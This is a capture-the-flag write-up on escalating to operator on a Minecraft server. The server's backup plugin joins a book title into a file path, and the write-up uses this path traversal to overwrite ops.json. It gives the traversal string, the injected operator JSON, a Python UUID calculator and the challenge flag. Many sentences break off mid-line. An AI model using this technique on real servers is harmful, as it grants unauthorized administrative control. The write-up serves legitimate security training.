Walkthrough
We are given a vanilla Minecraft 1.21.10 server with
path-of-the-blacksmith/
backup_manager-0.1.jar
Decompiling the plugin with CFR gives the interesting classes:
java -jar cfr.jar path-of-the-blacksmith/backup_manager-0.1.jar --outputdir src
Processing dev.dimu.backup_manager.BackupCommand
Processing dev.dimu.backup_manager.BackupManager
Processing dev.dimu.backup_manager.BackupManagerListener
Processing dev.dimu.backup_manager.FlagCommand
The goal is to become an operator and then run
Backup Path Traversal
The bug is in
String itemPath = slotPath + amount + "#" + key;
fullPath = itemPath + "#" + name;
file = new File((String)fullPath).getCanonicalFile();
There is no sanitization before
One small detail matters:
inventory_backups/<uuid>/0/1#written_book#../../../../../ops.json
the first
inventory_backups/<uuid>/0/ -> /app/inventory_backups/<uuid>/0/
1#written_book#.. -> literal directory component
.. -> /app/inventory_backups/<uuid>/0
.. -> /app/inventory_backups/<uuid>
.. -> /app/inventory_backups
.. -> /app
ops.json -> /app/ops.json
This is a write primitive, not a useful restore primitive. The backup file is written outside the slot directory, but
Becoming OP
Minecraft stores operators in
The plugin helpfully gives every joining player the permission
import hashlib
import uuid
name = "YourName"
h = hashlib.md5(("OfflinePlayer:" + name).encode()).digest()
ba = bytearray(h)
ba[6] = (ba[6] & 0x0f) | 0x30
ba[8] = (ba[8] & 0x3f) | 0x80
print(uuid.UUID(bytes=bytes(ba)))
Now we craft a written book with the title:
../../../../../ops.json
and the first page containing our operator entry:
[{"uuid":"<YOUR_UUID>","name":"<YOUR_NAME>","level":4,"bypassesPlayerLimit":false}]
In game, this can be done by placing the JSON on the first page and renaming the signed book to the traversal path.
After running
//1##
[{"uuid":"...","name":"...","level":4,"bypassesPlayerLimit":false}]
That prefix looks annoying, but Minecraft parses
Then we restart the server:
/restart
After reconnecting, the player is OP and can run:
/flag
The flag is:
CSCG{I_b37_Y0u_d1dn7_4ctu4lly_3xpEct_m1n3cr4f7}